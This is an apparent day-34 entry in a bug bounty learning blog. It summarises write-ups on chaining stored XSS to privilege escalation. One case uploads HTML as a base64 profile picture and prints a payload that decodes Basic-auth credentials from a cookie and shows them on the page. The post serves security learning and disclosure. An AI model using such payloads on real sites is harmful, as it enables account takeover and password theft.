Day 34/100 Hack and Improvement

1 minute read

Day 34 comes with more cases related to XSS and its capabilities such as privilege escalation and stealing plain text passwords.

Stored XSS to Privilege escalation

From Rajesh Ranjan. In this writeup, how researcher was able to escalate the privilege to Admin level user by chaining some low hanging fruits. Check the writeup here.

Case Review for Stored XSS which leads to Plaintext Password Disclosure

From Sam (CoffeeJunkie). There are several vulnerabilities that I’m obsessed about, and one of them is Unrestricted File Upload, and I’m ever more obsessed about its capabilities, and escalations that might have. In this case an Unrestricted File Upload brought a great chance for Stored XSS at the time to upload a HTML file as a profile picture.

According the attacker, the profile picture was being uploaded in PATCH method, and encoded in base 64, therefore the attacker proceeded to make the following HTML code:

<!DOCTYPE html>
<html>
<body>
<h1>Test</h1>
</body>
<script>
alert(1);
</script>
</html>

Where the attacker encoded the HTML code to base64 and replacing it for the picture. Therefore, in this case what’s left besides stored XSS is privilege escalation which can achieve creative things such as stealing passwords in plain text. This is the HTML coed that the attacker uploaded in order to achieve the privilege escalation in the site’s target.

<html>
<head>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/js-cookie@rc/dist/js.cookie.min.js"></script>
</head>
<body>
<h1>Password Display by bad5ect0r</h1>
<p>Your username is: <span id="uname"></span></p>
<p>Your password is: <span id="pass"></span></p>
</body>
<script>
$(document).ready(function () {
const AUTHH = Cookies.get('AUTHH');
const unb64 = atob(AUTHH);
const basic = unb64.split(' ');
const uname_pass = atob(basic[1]).split(':');
const user = uname_pass[0];
const pass = uname_pass[1];
$('#uname').html(user);
$('#pass').html(pass);
});
</script>
</html>

FULL write up here

Leave a comment